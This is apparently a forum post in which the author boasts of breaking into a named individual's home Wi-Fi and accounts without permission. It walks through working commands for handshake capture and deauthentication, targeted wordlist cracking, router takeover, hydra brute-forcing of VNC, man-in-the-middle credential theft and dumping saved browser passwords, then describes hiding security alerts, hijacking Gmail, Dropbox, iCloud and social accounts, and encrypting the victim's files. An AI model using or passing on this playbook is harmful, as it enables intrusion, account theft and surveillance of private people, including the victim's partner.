This is a detailed telling of how I hacked Philip M. over a period of several da

1. This is a detailed telling of how I hacked Philip M. over a period of several days. It started out as a typical router crack but I found myself motivated to dig deeper than usual. Without damaging the validity of the hack, I scrubbed as much identifiable info from the screenshots as possible to protect my identity.
2.  
3. Tools Used:
4. aircrack suite
5. cupp.py
6. pyrit
7. nmap
8. hydra
9. sparta
10. mitmf
11. sslstrip
12. arpspoof
13. ncrack
14. medusa
15. chromepass
16. FreeOTP
17. axcrypt
18. Patience
19.  
20.  
21. INFILTRATION:
22.  
23. $ airodump-ng -M wlan0mon
24.  
25. Code: [Select]
26.  
27. BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID MANUFACTURER
28.  
29. C4:6E:1F:XX:XX:XX -57 580 26 0 11 54e. WPA2 CCMP PSK XXXXX TP-LINK TECHNOLOGIES
30. F8:E4:FB:XX:XX:XX -60 808 286 0 6 54e. WPA2 CCMP PSK XXXXX Actiontec Electronics, Inc
31. 84:1B:5E:XX:XX:XX -64 2547 27432 0 11 54e WPA2 CCMP PSK BruceLee Netgear
32. D4:05:98:XX:XX:XX -70 304 32 0 1 54e. WPA2 CCMP PSK XXXXX ARRIS Group, Inc.
33. 00:14:6A:XX:XX:XX -71 401 3 0 3 54e. WPA2 CCMP PSK XXXXX CISCO SYSTEMS, INC.
34. 00:26:62:XX:XX:XX -71 382 2653 1 11 54e. WPA2 CCMP PSK XXXXX Actiontec Electronics, Inc
35. 00:7F:28:XX:XX:XX -73 56 5 0 11 54e. WPA2 CCMP PSK XXXXX Actiontec Electronics, Inc
36.  
37.  
38.  
39. There was enormous traffic coming from AP "BruceLee". Access Point's with this much activity are always exciting.
40.  
41. $ airodump-ng -c 1 -UM -w data/dump --bssid 84:1B:5E:XX:XX:XX wlan0mon
42.  
43. $ aireplay-ng -0 2 -a 84:1B:5E:XX:XX:XX -c 30:F7:C5:XX:XX:XX -e BruceLee wlan0mon
44.  
45.  
46. Now I needed to verify the integrity of the handshake and strip it of useless data captured during the airodump.
47.  
48. $ pyrit -r data/dump-117.cap analyze
49.  
50. $ pyrit -r data/dump-117.cap Desktop/BruceLee.cap strip
51.  
52. Parsing file 'data/dump-117.cap' (1/1)...
53. Parsed 4 packets (4 802.11-packets), got 1 AP(s)
54.  
55. #1: AccessPoint 84:1b:5e:xx:xx:xx ('BruceLee'):
56. #1: Station 30:f7:c5:xx:xx:xx, 1 handshake(s):
57. #1: HMAC_SHA1_AES, good, spread 1
58.  
59.  
60. With a solid capture, I was ready to bruteforce the cap. Netgear owners usually use custom passwords. I've never owned a Netgear router but imagine the firmware prompts users to enter a new password during the initial installation. This is especially wonderful to a cracker like myself because (as we all know), people have been using weak passwords since the conception of the password.
61.  
62. For this particular router, I created a custom wordlist before trying larger libraries at my disposal. The reason I chose to generate a new wordlist is simply because his AP was named: "BruceLee". This, to me, is a dead giveaway and indicator of the password potentially being somehow related to Bruce Lee...
63.  
64. As source material for the wordlist, I navigated to Bruce Lee's wikipedia and IMDb to scrape the pages for words of interest, such as: cities and countries where Bruce Lee was born and lived, Bruce's movie character names, movie titles, the months, days, years and names on the wiki, etc. I also added a few commonly used generic weak passwords. For this I used CUPP.
65.  
66. $ python cupp.py -i
67.  
68. $ pyrit -r Desktop/BruceLee.cap -i cupp-master/bruce.txt
69.  
70. Image
71.  
72. Parsing file 'Desktop/BruceLee.cap' (1/1)...
73. Parsed 4 packets (4 802.11-packets), got 1 AP(s)
74.  
75. Picked AccessPoint 84:1b:5e:xx:xx:xx ('BruceLee') automatically.
76. Tried 47254 PMKs so far; 906 PMKs per second.
77.  
78. The password is 'kato194027'.
79.  
80.  
81. Kato is Bruce Lee's character name in the 1960's tv series The Green Hornet. 1940 is the year Bruce was born. Not sure what 27 is. CUPP totally nailed it.
82.  
83. The truth is, I was prepared to spend a lot more time trying to crack this. A 61544 word count isn't exactly a comprehensive wordlist. This is where I decided to document my actions. With a password so easily guessed, I was counting the rest of his setup to be just as vulnerable and I just forged the master-key to his city.
84.  
85.  
86. RECONNAISSANCE:
87.  
88. This is by far the most exciting moment after cracking a router. The very first thing I do is find the gateway and change the password. This insures ownership of the router and makes it difficult for the victim to change their AP password (should I be suspected on the network).
89.  
90. $ route -n
91.  
92. Code: [Select]
93.  
94. Destination Gateway Genmask Flags Metric Ref Use Iface
95. 0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0
96. 192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
97.  
98.  
99.  
100. Typical gateway address. Login credentials are admin:admin or admin:password 95% of the time. In this case, Philip changed the default gateway password... unfortunately for him, it was also "kato194027".
101.  
102. Here I thoroughly examine the Attached Devices. We can see there are several, including a windows machine, iPhone (CHUCKLES) and iPad.
103.  
104. Image
105.  
106. Now for deeper recon, I used Sparta. It has quickly become my go-to recon tool of choice. It's slow to scan (patience), but comprehensive and worth the wait in this situation.
107.  
108. What is SPARTA?
109.  
110. "SPARTA is a python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analyzing results."
111.  
112. ...Basically the GUI lovechild of nmap and hydra.
113.  
114. Image
115.  
116. We can see he's using Plex, VNC and SSH. First thing I did was check to see if his SSH server had password authentication enabled. To my surprise, it did not.
117.  
118. Moving on, his Plex library was the least interesting thing here. I observed a new email address which I recorded but didn't take time to probe with known passwords.
119.  
120. Image
121.  
122. Poking at the VNC port, it was also password protected. Unlike SSH, this one I can bruteforce. For this I tried several tools: ncrack, medusa and hydra. The VNC server was extremely temperamental. After only a few consecutive attempts, the sever timed out and ignored additional attempts to authenticate. Timeouts seemed to last about 15 seconds. This wouldn't have been a big deal only, ncrack and hydra continued with new attempts even after the server timeouts. This meant a potentially correct password could be lost on the timed out server.
123.  
124. "[ERROR] VNC server connection failed"
125.  
126. There was a lot of that.
127.  
128. My experience with bruting VNC servers was limited so this was a learning process. Fortunately hydra has a delay function that allowed me to place some time between authentication attempts. With some time spent finding the servers sweet spot, I settled with "-W 2". This would try a new password every 2 seconds. Which sucked. -- I calculated just over 40,000 password attempts over a 24/hr period so I very carefully selected a wordlist and setup an old netbook I use for overnight and/or remote attacks such as this.
129.  
130. $ hydra -P wordlists/best110-wordlist.cupp.txt vnc://192.168.1.2:5900 -t 1 -W 2
131.  
132.  
133. While my netbook did it's thing, I took the opportunity to start prepping a mitm attack back on my Kali box.
134.  
135. After several attempts, it worked. You'll notice the "type" of browser he used was "Mobile Safari". I was a little surprised by this. Maybe the built-in Mail app stopped responding after the mitm attacks? Your guess is as good as any here. Either way, it worked.
136.  
137. Image
138.  
139. Next, I was careful not to login to his email over tor. After all, Iceweasel's browser fingerprint was very likely dramatically different from his browsers of choice. A brand new fingerprint with a brand new IP belonging to another country might arouse Gmails security features.
140.  
141. Image
142.  
143. This is a major breach. His email revealed an enormous amount of personal information about his life. Thanks to Google, I can now see Philip's web browsing habits from the last 365 days, his calendar/schedule, family photos and contacts, purchases and (partial) credit card information, his place of work, girlfriends address and their movements throughout the city. With enough analysis someone could probably determine their favorite places to eat and how often they fuck.
144.  
145. Though it is glorious, I'm withholding the screenshot of his daily Google Maps activity as it reveals my location within 100 miles.
146.  
147. I returned to my netbook a day later (patience) and discovered, remarkably, the VNC password cracked.
148.  
149. 1 of 1 target successfully completed, 1 valid password found
150. password: "monkey1234"
151.  
152. Image
153.  
154. Unfortunately for Philip, this is checkmate; his entire network, desktop and primary email address are completely compromised at this point. The above screenshot is his desktop via VNC. I might as well be sitting in his apartment at this point. His monitor size was much larger than my Kali VM allowed so my moneyshot is a little botched.
155.  
156. Now, his browser revealed several entries stored in the built-in password manager. They were protected by his Windows login password, which I didn't know, so I couldn't view them here. But this wasn't a concern, I came prepared. Enter: Chromepass.
157.  
158. "ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time."
159.  
160. Image
161.  
162. This I thought was really funny. Windows "User Account Control" kept closing my VNC connection when the ChromePass.exe was opened so I wrote a (laughably) stupid batch script to execute the exe. Windows security is truly ridiculous.
163.  
164.  
165. EXECUTION:
166.  
167. With his passwords in hand, it was time to wreck havoc.
168.  
169. I didn't want to alarm Philip of the compromise yet so I didn't immediately login (patience) to the VNC. From the looks of it, he's some kind of sales or operations manager at JCrew, handling special orders and such. He was piping his work emails into this gmail account so the odds of him working out of email during the breach seemed probable. After all, compromising his primary email account wasn't my only goal.
170.  
171. To avoid detection I created custom gmail filters to automatically Trash new emails from *.facebook.com, *.google.com and *.chase.com. This way his phone wouldn't start buzzing uncontrollably when changes occurred. Thanks again, Google.
172.  
173. Image
174.  
175. Damage Report:
176.  
177. - changed gmail password, changed backup email address associated w/ gmail, added 2FA with FreeOTP
178. - changed dropbox password, changed email associated w/ acct, added 2FA
179. - changed icloud password
180. - changed twitter acct password, email account
181. - encrypted his PC customer info and PC photo library
182. - changed facebook password
183.  
184. I thought this was a good place to stop. Truth be told, this venture lost its flavor once his VNC cracked; the challenge was over.
185.  
186. CONCLUSION:
187.  
188. Ultimately, I returned ownership of Philip's accounts after several hours. I cleared his desktop of shortcuts and created a Dear\ Philip.txt:
189.  
190. Image"